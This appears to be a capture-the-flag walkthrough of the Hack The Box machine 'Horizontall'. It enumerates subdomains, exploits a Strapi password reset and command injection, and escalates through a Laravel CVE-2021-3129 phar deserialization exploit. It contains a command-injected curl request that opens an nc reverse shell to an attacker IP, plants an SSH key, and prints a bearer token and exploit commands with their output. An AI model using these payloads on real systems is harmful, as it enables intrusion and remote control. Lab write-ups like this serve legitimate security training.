HTB - HORIZONTALL

ENUMERATION

MACHINE IP

export IP=10.10.11.105

NMAP SCAN RESULT

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Enumerating/Exploring Web Resources

  • http://10.10.11.105 will redirect to http://horizontall.htb/

  • So add this to /etc/hosts

echo "10.10.11.105 horizontall.htb">> /etc/hosts

  • Nothing Found in web panel

  • Trying Directory Bruteforcing

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u http://10.10.11.105/ -t 100 -x php,txt,js,html,jpg  -q

  • Nothing Useful Found in Directory Bruteforcing

  • As this is a nginx server with a nginx reverse proxy and IP was earlier autoresolved when tried to browse.

  • So we can try for Subdomain Enumeration or Bruteforcing

  • Using Gobuster for subdomain Bruteforcing

gobuster dns -d horizontall.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 200
  • Found interesting Subdomain
Found: api-prod.horizontall.htb
  • Add this subdomain to /etc/hosts
echo "10.10.11.105 api-prod.horizontall.htb">> /etc/hosts

  • Nothing interesting found on the subdomain

  • Trying Further Directory Bruteforcing to this subdomain using gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u http://api-prod.horizontall.htb/ -t 100 -x php,txt,js,html,jpg  -q
  • Found Interesting Directories
/index.html           (Status: 200) [Size: 413]
/reviews              (Status: 200) [Size: 507]
/users                (Status: 403) [Size: 60] 
/admin                (Status: 200) [Size: 854]
/Reviews              (Status: 200) [Size: 507]
/robots.txt           (Status: 200) [Size: 121]
/Admin                (Status: 200) [Size: 854]
/REVIEWS              (Status: 200) [Size: 507]

  • Checking Directoriesn manual

  • /reviews or /Reviews contains some reviews of users and the usernames

[{"id":1,"name":"wail","description":"This is good service","stars":4,"created_at":"2021-05-29T13:23:38.000Z","updated_at":"2021-05-29T13:23:38.000Z"},{"id":2,"name":"doe","description":"i'm satisfied with the product","stars":5,"created_at":"2021-05-29T13:24:17.000Z","updated_at":"2021-05-29T13:24:17.000Z"},{"id":3,"name":"john","description":"create service with minimum price i hop i can buy more in the futur","stars":5,"created_at":"2021-05-29T13:25:26.000Z","updated_at":"2021-05-29T13:25:26.000Z"}]
  • Users
wail - id=1
doe - id=2
john - id =3

  • /users gave 403 (Forbidden)

  • /robots.txt, Nothing found here

  • Found One more directory using Burp Active Scanning

/users-permissions/init
  • Response from this directory
{"hasAdmin":true}
  • So we can predict that the admin account is enabled.

Getting Reverse Shell

  • After Further research we found that this stripe web panel is Vulnerable to Password Reset Vulnerability
https://www.exploit-db.com/exploits/50239
  • We can Download this Exploit and run it, it will give new reseted password and the JSON Token
  • The Authentication JSON token can be used in below request to get reverse shell.
curl -i -s -k -X $'POST' -H $'Host: api-prod.horizontall.htb' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMxMTY0NjMyLCJleHAiOjE2MzM3NTY2MzJ9.cuZYWzy1Y7hk-ajhlHExSWxDVGbJqkWXmuhxUZzSzG8' -H $'Content-Type: application/json' -H $'Origin: http://api-prod.horizontall.htb' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f)\",\"port\":\"80\"}' $'http://api-prod.horizontall.htb/admin/plugins/install'
  • For More Details About this Check out this blog
https://bittherapy.net/post/strapi-framework-remote-code-execution/

  • We should have got the reverse shell

  • We can find the user flag /home/developer/user.txt

PRIVILEDGE ESCALATION

  • Running linpeas.sh

  • Got Some open Ports

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      1856/node /usr/bin/ 
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -
  • Here on port:8000 at localhost
curl 0.0.0.0:8000 > index.html

  • We can see that the Laravel is Running at version Laravel v8 (PHP v7.4.18)

  • We found that this Laravel Version is Vulnerable to RCE with CVE-2021-3129

  • After further Research Found this Github Repo to Exploit this vulnerability.

https://github.com/ambionics/laravel-exploits

Port Forwarding using SSH

  • Port 8000 is the local port of USER Machine So we need that port to our Attacker Machine.

  • We can use SSH Port Forwarding For That.

  • STEPS TO PORT FORWARDING

  1. Create a SSH Key Pair ssh-keygen -t rsa

  2. Put PUBLIC KEY inside the User Machine(Hacked Machine) under /opt/strapi/.ssh/authorized_keys , Here authorized_key is the file containing the Public key (Its not a folder)

  3. Use Private Key from Attacker Machine to connect back to User Machine and create Port Forwarding to Port 8000

ssh -L 8000:localhost:8000 [email protected] -i keypair
  • (Here Keypair is the Private Key generated Earlier)
  1. Now after Successful connection, try to browser the port 8000 from your Machine. curl 0.0.0.0:8000 , So we should have the successfull port forwording. Now we can use the exploit.
  • Now We can use the RCE to get the root flag. Follow the github repo instructions mentioned in repo.
$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id 
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
--------------------------
uid=1000(cf) gid=1000(cf) ...
--------------------------
Logs cleared
  • Lets Modify this to get the Root Flag.
php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "cat /root/root.txt" 

./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
  • Output
python3 laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar                                                  
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
--------------------------
d31c599c35924f3afdd3447c96c8ea65
--------------------------
+ Logs cleared
  • We should have got the Root Flag.

<3 Horizontall Has Been Pwned!